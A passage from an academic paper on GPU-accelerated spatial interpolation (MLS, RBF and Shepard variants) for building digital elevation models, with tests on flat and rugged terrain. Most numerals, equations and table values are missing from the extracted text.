(hasm) in constructing large-scale and fine resolution dem surfaces by the use of gpus and applied this acceleration algorithm to simulations of both ideal gaussian synthetic surfaces and real topographic surfaces in the loess plateau of gansu province. tan et al. ( ) presented a novel method to generate contour lines from grid dem data, based on the programmable gpu pipeline, that can be easily integrated into a d gis system. chen et al. ( ) demonstrated a new algorithm for reconstructing contour maps from raster dem data for digital-earth and other terrain platforms in real-time entirely based on modern gpus and programmable pipelines. the rbf, kriging, mls and shepard’s interpolation algorithms are the most frequently used spatial interpolation algorithms, among which, the kriging method can be regarded as an instance of rbf framework (peng et al., ). therefore, in this paper, we comparatively investigate the performance of the rbf-based, mls-based, and shepard’s interpolation algorithms for building dems by evaluating the influence of terrain type, raw data density, and distribution patterns on the interpolation accuracy and computational efficiency. the rest of the paper is organized as follows. ‘background’ briefly introduces the basic principles of eight interpolation methods. ‘methods’ concentrates mainly on our parallel implementations of the eight interpolation methods and creation of the testing data. ‘results’ introduces some of the experimental tests performed on the cpu and gpu. ‘discussion’ discusses the experimental results. finally, ‘conclusion’ states conclusions from the work. background in this section, we briefly introduce eight spatial interpolation algorithms. mls-based interpolation algorithms the mls method obtains the fitting surface by solving the equation group derived from minimizing the sum of the squares of the errors between the fitting data and the given node data. original mls interpolation algorithm the mls approximation is used to approximate field variables and their derivatives. in a domain �, the mls approximation f h(x) of the field variable f (x) in the vicinity of a tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. point x̄ is given as f h(x)= m∑ j= pj(x)·aj(x̄)=p t (x)·a(x̄) ( ) where pj(x),j = , ,...,m is a complete basis function with coefficients aj(x̄). at each point x̄, aj(x̄) is chosen to minimize the weighted residual l − norm (l − norm refers to ‖x‖ , where x =[x ,x ,...,xn] t , and ‖x‖ = √( |x | +|x | +|x | +···+|xn| ) ): j = n∑ i= w(x̄−xi) [ pt (xi)a(x̄)−fi ] ( ) where n is the number of nodes in the compact-supported neighborhood of x̄ and fi refers to the nodal parameter of f at x =xi . nodes refer to data points in the compact-supported neighborhood of x̄. compact-supported, i.e., point x̄ is only related to the nodes of its neighborhood, xi is one of the nodes in the compact-supported neighborhood. and w(x−xk) is the compact-supported weight function. the most commonly used weight functions are the spline functions, for example, the cubic spline weight function (eq. ( )): w(s̄)=   − s̄ + s̄ , − s̄+ s̄ − s̄ , , s̄≤ < s̄≤ s̄> ( ) where s̄= ssmax and s= x̄−xi . the minimum of j with respect to a(x̄) gives the standard form of mls approximation: f h(x)= n∑ i= φi (x)fi = (x)f. ( ) orthogonal mls interpolation algorithm for a given polynomial basis function pi(x), i= , ,···,m, there is an orthonormal basis function qi(x,x̄) that satisfies: q (x,x̄)=p (x) qi(x,x̄)=pi(x)− i− ∑ j= αij(x,x̄)qj(x,x̄),i= , ,···,m ( ) where αij(x,x̄) is the coefficient that makes qi(x,x̄) perpendicular to qj(x,x̄). αij(x̄)= ∑n k= wk(x̄)pi(xk)qj(xk,x̄)∑n k= wk(x̄)q j (xk,x̄) ( ) tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. because the coefficient matrix is a diagonal matrix, the solution for ai(x) does not require matrix inversion, i.e., ai(x̄)= ∑n k= wk(x̄)qi(xk,x̄)fk∑n k= wk(x̄)q i (xk,x̄) ( ) where ai and aj(x̄) (eq. ( )) have the same definition. fk and fi (eq. ( )) have the same definition, i.e., the nodal parameter of f at x =xk. finally, ai and the orthonormal basis function qi(x,x̄) are fitted into eq. ( ) to obtain the orthogonal mls approximation f h(x). when the number or order of basis functions increases, only am+ and αm+ need to be calculated in gram–schmidt orthogonalization (steve, ); recalculation of all entries in the coefficient matrix is not needed. this could reduce the computational cost and the computational error. lancaster’s mls interpolation algorithm a singular weight function is adopted to make the approximation function f h(x) constructed by the interpolation type mls method satisfy the properties of the kronecker δ function: ω(x,xk)= { ‖(x−xk)/ρk‖ -α , , ‖x−xk‖≤ρk ‖x−xk‖>ρk ( ) let p (x)≡ ,p (x),...,pm̄(x) denote the basis function used to construct the approximation function, where the number of basis functions is m̄+ . to implement the interpolation properties, a new set of basis functions is constructed for a given basis function. first, p (x) are standardized, i.e., p̃ (x,x̄)= [∑n k= ω(x,xk) ] / ( ) then, we construct a new basis function of the following form: p̃i(x,x̄)=pi(x̄)− n∑ k= ω(x,xk)∑n l= ω(x,xl) pi(xk),i= , ,...,m̄. ( ) rbf-based interpolation algorithm the rbf operates as a spline, essentially fitting a series of piecewise surfaces to approximate a complex terrain. let x ={x ,x ,...,xn} be a set of pairwise distinct points in a domain �⊆rd with associated data values fi, i= , ,...,n . we consider the problem of construction a d-variety function f ∈ck ( rd ) that interpolates the known data. specifically, we require f(xi)= fi, i= , ,...,n . if we take f in the form. f(x)= n∑ j= wjϕ (∥∥xi−xj∥∥ ) ( ) tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where ϕ : [ ,∞]→r is a suitable continuous function, the interpolation conditions become: n∑ j= wjϕ (∥∥xi−xj∥∥ )= fi, i= , ,...,n. ( ) shepard’s interpolation algorithms shepard ( ) proposed a series of interpolation algorithms on the basis of weighting averages. these algorithms are termed shepard’s method. the essential idea behind shepard’s method is to estimate expected values of the interpolation point by weighting averages of the nearby discrete points as follows: let ( xi,yi ) , i= , ,...,n be the interpolation point and fi be the corresponding value at interpolation point ( xi,yi ) . the expected value f at any point can be expressed as f (x)= n∑ i= wi(x)fi∑n j= wj(x) ( ) where w(x) is a weight function. the differences between the different variants of shepard’s method are in the selection of different weighting functions. in this subsection, four common variants of shepard’s method will be briefly introduced (eqs. ( )–( )). variant a of shepard’s interpolation algorithm first, select the influence radius r> and let the weight function be w(r)=   r , ( r r − ) , , <r ≤ r r <r ≤r r >r ( ) then, a variation of shepard’s interpolation will be obtained. variant b of shepard’s interpolation algorithm when employing the following weight function (eq. ( )), a new variation of shepard’s interpolation will be obtained. w(s̄)=   − s̄ + s̄ , − s̄+ s̄ − s̄ , , s̄≤ < s̄≤ s̄> ( ) inverse distance weighted (idw) interpolation algorithm if the weight function is selected as wi(x)= d(x,xi) α ( ) the idw interpolation is obtained. typically, α= in the standard idw. where d(x,xi) is the distance between the interpolation point xi and the nearby discrete point x. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aidw interpolation algorithm the adaptive inverse distance weighted (aidw) is an improved version of the standard idw (shepard, ) originated by lu & wong ( ). the distance-decay parameter α is no longer a prespecified constant value but is adaptively adjusted for a specific unknown interpolated point according to the distribution of the nearest neighboring data points. the parameter α is taken as α(µr)=   α , α [ − (µr− . )]+ α (µr− . ), α (µr− . )+α [ − (µr− . )], α [ − (µr− . )]+ α (µr− . ), α (µr− . )+α [ − (µr− . )], α , . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . . ≤µr≤ . ( ) µr=   , . − . cos[π(r(s )−rmin)/rmax], , r(s )≤rmin rmin≤r(s )≤rmax r(s )≥rmax ( ) where the α , α , α , α , α are the to-be-assigned five levels or categories of distance decay value. rmin or rmax refer to a local nearest neighbor statistic value, and rmin and rmax can generally be set to . and . , respectively. then, r(s )= √ n/a k k∑ i= di ( ) where n is the number of points in the study area, a is the area of the study region, k is the number of nearest neighbor points, di is the nearest neighbor distances and s is the location of an interpolated point. methods implementations of the spatial interpolation algorithms we have implemented the spatial interpolation algorithms of rbf (ding et al., b), mls (ding et al., a), idw (mei, ), and aidw (mei, xu & xu, ) in our previous work. to evaluate the computational performance of the gpu-accelerated interpolation, we implement and compare ( ) the sequential implementation, ( ) the parallel implementation developed on a multicore cpu, ( ) the parallel implementation using a single gpu, and ( ) the parallel implementation using multiple gpus. there are two key ideas behind the presented spatial interpolation algorithm: ( ) we use an efficient k-nearest neighbor (knn) search algorithm (mei, xu & xu, ) to find the local set of data points for each interpolated point. ( ) we employ the local set of data points to compute the prediction value of the interpolated point using different interpolation methods. mei & tian ( ) evaluated the impact of different data layouts on the computational efficiency of the gpu-accelerated idw interpolation algorithm. they implemented three tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. idw versions of gpu implementations, based upon five data layouts, including the structure of arrays (soa), the array of structures (aos), the array of aligned structures (aoas), the structure of arrays of aligned structures (soaos), and a hybrid layout, then they carried out several groups of experiments to evaluate the impact of different data layouts on the interpolation efficiency. based on their experimental results, the layout soa is shown in listing . struct pt { float x[n]; float y[n]; float z[n]; }; struct pt mypts; listing : the layout soa the knn (cover & hart, ) is a machine learning algorithm often used in classification, the k-nearest neighbor means that each data point can be represented by its k nearest neighbor points. in all of the presented interpolation algorithms, for each interpolation point, a local set of data points is found by employing the knn search procedure and the found local sets of data points are then used to calculate the prediction value of the interpolation point. for large size of dem, the knn search algorithm can effectively improve the speed of interpolation by searching only the points near the interpolation points (mei, xu & xu, ). assuming there are m interpolated points and n data points, the process of the knn search algorithm is as follows: step : the k distances between the k data points and each of the interpolated points are calculated; for example, if the k is set to , then there are distances needed to be calculated; see the row (a) in fig. . step : the k distances are sorted in ascending order; see the row (b) in fig. . step : for each of the rest (m-k) data points, ( ) the distance d is calculated, for example, the distance is . (d = . ); ( ) the d with the kth distance are compared: if d < the kth distance, then replace the kth distance with the d (see row (c)); ( ) iteratively compare and swap the neighboring two distances from the kth distance to the st distance until all the k distances are newly sorted in ascending order; see the rows (c)–(e) in fig. . creation of the testing data two sets of dem data were downloaded from the geospatial data cloud (http: //www.gscloud.cn//). more specifically, two -m resolution dems for two km × km regions in hebei and sichuan provinces were selected. the topography of hebei province is mainly plain, while the topography of sichuan province is mainly mountainous. two sets of dem data are derived from remote sensing satellites and compiled by the cnic tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.gscloud.cn/ http://www.gscloud.cn/ http://dx.doi.org/ . /peerj-cs. figure an illustration of the process of the knn search algorithm. full-size doi: . /peerjcs. /fig- (computer network information center, chinese academy of sciences). more details on the selected dems are presented in fig. . data points and interpolated points (listed in tables and ) are produced as follows: ( ) the selected dems is imported into the software arcgis. ( ) a square region s is delimited in selected dems. for example, the two km × km regions shown in fig. . ( ) generating the x and y coordinates of randomly determined points by random number generation algorithms in the square region s, and then accessing the corresponding z coordinates from the dem (the randomly determined points are the data points p ). evenly distributed (regularly distributed) data points are randomly extracted using the linear congruential random number method (lehmer, ), and normally distribution (irregularly distributed, mathematical expectation µ= , , standard deviation σ = , ) data points are randomly extracted using the box–muller method (box & muller, ). for example, we set size , the extracted regularly distributed data points p = , (table ), and density is p /s (s is the area of s, and s is a fixed value, where s = km × km). ( ) the square region s is triangulated into a planar triangular mesh using the del auney algorithm (watson, ), the mesh nodes are considered to be the interpolation points, with known x and y coordinates and unknown z coordinates, the unknown z coordinates is the estimated value to be obtained by interpolation. according to the randomly sampled points obtained in step , we use the interpolation method mentioned in ‘background’ to interpolate. then, the corresponding exact elevation of the interpolation point is obtained by accessing the z value of the dem at the associated x and y coordinates. finally, the z values at the mesh points are used as control for testing the accuracy of the interpolated z values. to quantitatively determine regular and irregular point sampling, average nearest neighbor analysis (ebdon, ) is applied. in the proposed method, nearest neighbor ratio (nnr) is used to evaluate the distribution pattern of sample points: if the nnr > , the distribution pattern shows clustered; if the nnr < , the distribution pattern shows tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the selected zone and zone . (a) . d model of the zone study area and (b) . d model of the zone study area. full-size doi: . /peerjcs. /fig- dispersed. as listed in table , the nnr of regularly-distributed, approximately . , is greater than , the distribution pattern is dispersed (fig. a), that is regularly-distributed; the nnr of irregularly-distributed, approximately . , is less than , the distribution pattern is clustered (fig. b), that is irregularly-distributed. zone (flat zone) the first selected region is located in hengshui city, hebei province. the dem of this region has the identifier astgtm_n e and is derived from the geospatial data cloud (http://www.gscloud.cn/). the location and elevation of this region is illustrated in fig. . in the region, the highest elevation is m and the lowest is m. we translated the tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.gscloud.cn/ http://dx.doi.org/ . /peerj-cs. table ten used groups of experimental testing data in the flat zone. data set number of data points number of interpolated points size , , size , , size , , , size , , , , regularly- distributed size , , , , size , , size , , size , , , size , , , , irregularly- distributed size , , , , table ten used groups of experimental testing data in the rugged zone. data set number of data points number of interpolated points size , , size , , size , , , size , , , , regularly- distributed size , , , , size , , size , , size , , , size , , , irregularly- distributed size , , , , table the nnr of regular and irregular point sampling. data set flat zone rugged zone size . . size . . size . . size . . regularly- distributed size . . size . . size . . size . . size . . irregularly- distributed size . . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. significant significant(random) clustered random dispersed significance level (p-value) critical value (z-score) . . . --- . . . <- . - . -- . - . -- . - . - . . - . . - . > . significant significant(random) clustered random dispersed significance level (p-value) critical value (z-score) . . . --- . . . <- . - . -- . - . -- . - . - . . - . . - . > . a b figure the distribution patterns determined by the average nearest neighbor analysis. (a) regu- larly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- x coordinate by , and the y coordinate by , , to obtain a km × km square area centered on the origin. five sets of benchmark test data were generated in this region; see table . zone (rugged zone) the second selected region is located in ganzi tibetan autonomous prefecture, sichuan province. the dem of this region has the identifier astgtm_n e and is derived from the geospatial data cloud (http://www.gscloud.cn/). the location and elevation of this region is illustrated in fig. . in the region, the highest elevation is , m and the lowest is , m. we translated the x coordinate by , and the y coordinate by , , to obtain a km × km square area centered on the origin. five sets of benchmark test data are generated in this region; see table . criteria for comparison in this paper, we evaluate the interpolation algorithms described in ‘background’ by: ( ) comparing the interpolation accuracy and efficiency when the terrain is gentle and rugged, and ( ) comparing the interpolation accuracy and efficiency when data points are evenly distributed and nonuniformly distributed. the accuracy of each interpolation method is analyzed by comparing the elevation values predicted by the interpolation algorithms with the real dem elevation value. the efficiency of each interpolation method is compared by benchmarking the running time of tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.gscloud.cn/ http://dx.doi.org/ . /peerj-cs. table specifications of the workstation and the software used for the experimental tests. specifications details cpu intel xeon e - v cpu frequency . ghz cpu ram gb cpu core gpu quadro m gpu memory gb gpu core os windows professional compiler visual studio cuda version v . different implementations developed in sequence, on a multicore cpu, on a single gpu, and on multiple gpus. results experimental environment to evaluate the computational performance of the presented various parallel interpolations, we conducted ten groups of experimental tests in both the flat zone and the rugged zone on a powerful workstation equipped with two quadro m gpus. the specifications of the workstations are listed in table . test results of interpolation accuracy for different interpolation algorithms in this paper, we adopt the normalized root-mean-square-error (nrmse) as the metric to measure the interpolation accuracy of the different interpolation algorithms. the nrmse is defined in eq. ( ). normalized root-mean-square-error (nrmse): nrmse = max ≤i≤ni ∣∣fa∣∣ √√√√ ni ni∑ i= ∣∣fn−fa∣∣ ( ) where ni is the number of interpolated points, fa is the theoretically exact solution of the ith interpolated point (the elevation of the dem at this point), and fn is the predicted value of the ith interpolated point. the interpolation accuracy of the ten groups of experimental tests is listed in table . the numerical value shown in table is nrmse, which means that the smaller the numerical value, the higher the interpolation accuracy. as listed in table , the most accurate interpolation algorithm is the mls interpolation algorithm. for the small size (size ), compared with other two algorithms, the mls algorithm is . %– . % more accurate than the rbf algorithm, and it is . %– . % more accurate than the shepard’s algorithm. on the other hand, for the same algorithm, when the distribution pattern is the same, its accuracy in the flat area is higher than that tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table interpolation accuracy of the parallel interpolation algorithms implemented on a single gpu. data set original mls orthogonal mls lancaster’s mls knn rbf knn aidw knn idw knn shepard knn shepard size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− regularly dis- tributed size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− flat zone irregularly- distributed size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− regularly- distributed size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− size . e− . e− . e− . e− . e− . e− . e− . e− rugged zone irregularly- distributed size . e− . e− . e− . e− . e− . e− . e− . e− the rugged area. for example, for the mls algorithm, when the distribution pattern is nonuniformly distributed, the accuracy of the lancaster’ mls algorithm in the flat area is approximately % higher than that of the lancaster’ mls algorithm in the rugged area. as shown in figs. and , the nrmses of various interpolation methods for the regularly distributed are less than % of the nrmses of various interpolation methods for the irregularly distributed. the above behavior becomes even more obvious in the rugged zone than in the flat zone. thus, the regular distribution provides a more accurate solution for both the rugged and the flat areas. test results of computational efficiency for different interpolation algorithms in our experimental tests, the value of k is . those twenty groups of experimental tests were performed on the workstations mentioned above. the running times and corresponding speedups of each group of experimental tests are presented in the following section. the speedup is defined in eq. ( ). speedup= tseq tpar ( ) where tseq is the running time of sequential implementation, and tpar is the running time of parallel implementation. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure interpolation accuracy of gpu-accelerated interpolation algorithms in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- figure interpolation accuracy of gpu-accelerated interpolation algorithms in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- computational efficiency of sequential implementations as listed in table , for the sequential version, when giving the same sets of data points and interpolation points, the order of computational time from fastest to slowest is: the shepard’s interpolation method, the mls interpolation, and the rbf interpolation. the computational time of shepard’s interpolation method is approximately % less than the mls interpolation method, and it is approximately % less than the computational time of the computational time of rbf interpolation method. computational efficiency of parallel implementations as shown in figs. – , the parallel version developed on multi-gpus has the highest speedup in the three parallel versions. except for the rbf interpolation method, the maximum speedups of other interpolation algorithms are greater than . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table running time (ms) of sequential implementations. data set original mls orthogonal mls lancaster’s mls knn rbf knn aidw knn idw knn shepard knn shepard size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . regularly- distributed size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . flat zone irregularly- distributed size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . regularly- distributed size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . size , . , . , . , . , . , . , . , . rugged zone irregularly- distributed size , . , . , . , . , . , . , . , . figure comparison of the speedups of the parallel implementations developed on a multicore cpu in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of the speedups of the parallel implementations developed on a multicore cpu in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- figure comparison of the speedups of the parallel implementations developed on a single gpu in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- as shown in figs. and , for the parallel version developed on multi-gpus, the order of the computational time from fastest to slowest is: the shepard’s interpolation, the mls interpolation, the rbf interpolation method. the computational time of shepard’s interpolation method is %– % less than the computational time of the mls interpolation method, and it is %– % less than the computational time of the rbf interpolation method. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of the speedups of the parallel implementations developed on a single gpu in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- figure comparison of the speedups of the parallel implementations developed on multi-gpus in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- discussion the interpolation accuracy and computational efficiency are two critical issues that should be considered first in any interpolation algorithms. the interpolation accuracy should first be satisfied; otherwise, numerical analysis results would be inaccurate. in addition, the computational efficiency should be practical. more specifically, in the subsequent section we will analyze ( ) the interpolation accuracy of the presented eight gpu-accelerated interpolation algorithms with different data sets and ( ) the computational efficiency of the presented eight interpolation algorithms. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of the speedups of the parallel implementations developed on multi-gpus in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- figure comparison of the running time of the parallel implementations developed on multi-gpus in the flat zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- comparison of interpolation accuracy to better compare the accuracy of the described interpolation algorithms, in the case of the highest sample density (size ) and the lowest sample density (size ), we listed those algorithms with the highest accuracy (i.e., the minimum nrmse) in table . as listed in table , for lower sample density (size ), the original mls algorithm has the best interpolation performance in regularly distributed. however, for higher sample density (size ), in general, the improved mls algorithm lancaster’s mls has higher interpolation accuracy than the original mls. in particular, the original mls has best accuracy in the rugged zone with irregularly distributed interpolation points. on the other hand, for shepard’s interpolation algorithms, the knnaidw is an improved version of the idw, which can adaptively determine the power parameter tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of the running time of the parallel implementations developed on multi-gpus in the rugged zone. (a) regularly distributed and (b) irregularly distributed. full-size doi: . /peerjcs. /fig- table the algorithm with the highest accuracy in congeneric algorithms and its corresponding nrmse. data set mls algorithm rbf algorithm shepard’s interpolation algorithm regularly- distributed size original mls ( . e– ) knnrbf ( . e– ) knnshepard ( . e– ) flat zone size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) irregularly distributed size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) regularly- distributed size original mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– )rugged zone size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnidw ( . e– ) irregularly- distributed size lancaster’s mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) size original mls ( . e– ) knnrbf ( . e– ) knnaidw ( . e– ) according to the spatial points’ distribution pattern. therefore, in shepard’s interpolation algorithms, the knnaidw has higher accuracy in most situations. although under some specific conditions, the knnshepard and knnidw have higher accuracy than knnaidw, the accuracy of knnaidw is quite similar to them. as listed table . for the same flat zone, when the data points are uniformly distributed, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method; when the data points are normal distribution, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, shepard’s interpolation method, and rbf. for the same rugged zone, regardless of the tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure frequency distribution of the relative error for the parallel implementation developed on a single gpu in the flat zone. (a) regularly distributed and (b) irregularly distributed. the size of data points: size . full-size doi: . /peerjcs. /fig- density and distribution of the data points, the interpolation accuracy order from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method. to further verify the above conclusions obtained from nrmse, we investigated the relative error of the interpolated results for the same set of data points and interpolation points (i.e., size ). the algorithm with the highest accuracy (i.e., the minimum nrmse) is used to represent the kind of algorithm. as shown in figs. and , the y axis is the lgn (n is the count of relative error), and the x axis is the relative error e. the e is defined in eq. ( ). ei= ∣∣∣∣fn−fafa ∣∣∣∣× % ( ) where fa is the theoretically exact solution of the ith interpolated point (the elevation of the dem at this point), fn is the predicted value of the ith interpolated point, and ei is the relative error of the ith interpolated point. as listed in tables and . for better evaluation of relative error, we also calculated the mean relative error e. the e is defined in eq. ( ) e = ∑ni i= ei ni ( ) where ni is the number of interpolated points. in the flat zone as shown in fig. , for the flat region, when the data points are evenly distributed, the frequency statistical curve of the mls is the highest when it is close to zero, the lowest when it is far away from zero, and the relative error distribution range is smaller, which means that the error of mls method is small. the characteristics of the frequency statistical curve of shepard’s method are completely opposite to those of mls, which means that the tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure frequency distribution of the relative error for the parallel implementation developed on a single gpu in the rugged zone. (a) regularly distributed and (b) irregularly distributed. the size of data points: size . full-size doi: . /peerjcs. /fig- table the algorithm with the highest accuracy in congeneric algorithms and its corresponding mean relative error in the flat zone. distribution mean relative error e (%) original mls knnrbf knnshepard bregularly- distributed . . . lancaster’s mls knnrbf knnaidwirregularly- distributed . . . table the algorithm with the highest accuracy in congeneric algorithms and its corresponding mean relative error in the rugged zone. distribution mean relative error e (%) original mls knnrbf knnaidwregularly- distributed . . . lancaster’s mls knnrbf knnaidwirregularly- distributed . . . error of mls method is large. for the rbf interpolation algorithm, the characteristic of the frequency statistics curve is a transitional phase between those for the mls and those for shepard’s method. the above curve features and e (table ) illustrate that the interpolation accuracy is from high to low in this condition: the mls interpolation algorithm, rbf, and shepard’s interpolation method. when the data points are normally distributed, the relative error distribution ranges of all the interpolation methods are larger than that for the uniformly distributed data points. as shown in fig. , the characteristics of the frequency statistics curve of rbf are obvious, the frequency statistical curve of rbf is above the frequency statistical curves of mls and tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. shepard’s method, which means that the error of rbf method is larger. the characteristics of frequency statistical curves of mls and shepard’s method are very similar, and the relative error distribution range of mls is the largest. as listed in table , in the flat zone, the accuracy of mls is slightly higher than shepard’s method when the data points are normally distributed. in the rugged zone as shown in fig. , for the rugged region, regardless of whether the data points are uniformly distributed or normally distributed, the characteristics of frequency statistical curves of mls, rbf and shepard’s method are similar to those illustrated in fig. . however, in fig. b, it is a little different in that most of the frequency statistical curve of shepard’s method is higher than the rbf’s. as listed in table , the interpolation accuracy is from high to low: the mls interpolation algorithm, rbf, and shepard’s interpolation method. according to the above figures and tables, some summary conclusions are obtained as follows: for the same region, when the density of data points is almost the same, the interpolation accuracy when the data points are evenly distributed is higher than the interpolation accuracy when the data points are nonuniformly distributed. as listed in tables and , when the data points are evenly distributed, the gap of the accuracy between the three variations of the mls method, rbf, and shepard’s interpolation methods increases with the decrease of point density. as shown in figs. and , when the data points are nonuniformly distributed, the maximum relative errors of mls is larger than other algorithms’, however, mls method has lower nrmse and e. a small number of larger relative errors has little effect on the overall interpolation accuracy. a large number of small and medium relative errors are the key to determine the interpolation accuracy of the algorithm. as listed in table , compared with the uniform distribution, when the points are nonuniformly distributed the difference in the accuracy of the interpolation algorithms is not as sensitive to the changes of point density. compared with the three variations of the mls method and the rbf method, shepard’s interpolation method is quite suitable for cases where the data points have a smooth trend. when interpolating for the data points with an undulating trend, the accuracy of shepard’s interpolation method will be poor. when the density of data points is small, this rule becomes more obvious. comparison of computational efficiency the parallel implementations developed on multi-gpus is the most efficient, therefore, the parallel implementations developed on multi-gpus are discussed below. in the flat zone as illustrated in fig. , for the flat region, except for the knnrbf, when the number of data points is not much different, the nonuniformly distributed data point set requires tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of the running time cost in the knn search procedure. (a) sequential version on single cpu and (b) parallel version on single gpu. full-size doi: . /peerjcs. /fig- significantly more interpolation time than the uniformly distributed data point set, and with the increase of the number of points, interpolation time does increase as well. as illustrated in fig. , the speedups achieved by the rbf interpolation method is generally small, and its speedups are not much different in various cases. however, when the size of data point set is size and the data point set is nonuniformly distributed, the speedup of the rbf interpolation method is larger than other methods, which means that the benefits of parallelism are lower in this case. as indicated above, the distribution pattern of data points strongly influences the interpolation efficiency. in the rugged zone as illustrated in figs. and , the running time and the speedups in the rugged region are almost the same as those in the flat region. in other words, the characteristics of the terrain elevation of data points have a weak influence on computational efficiency. influence of knn search on computational efficiency according to ‘methods’ , in the interpolation procedure, the knn search may affect the entire computational efficiency of interpolation. to specifically evaluate the influence of the knn search on the computational efficiency of the entire interpolation procedure, we investigated the computational cost of the knn search for relatively large numbers of data points, i.e., for the dataset of size (listed in fig. ). note that we employ four sets of data points with size , including ( ) the set of uniformly distributed data points and the set of nonuniformly distributed data points in the flat region and ( ) the set of uniformly distributed data points and the set of nonuniformly distributed data points in the rugged region. as listed in table , for the sequential version, regardless of whether the data points are uniformly distributed or nonuniformly distributed, the knn search costs approximately tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- 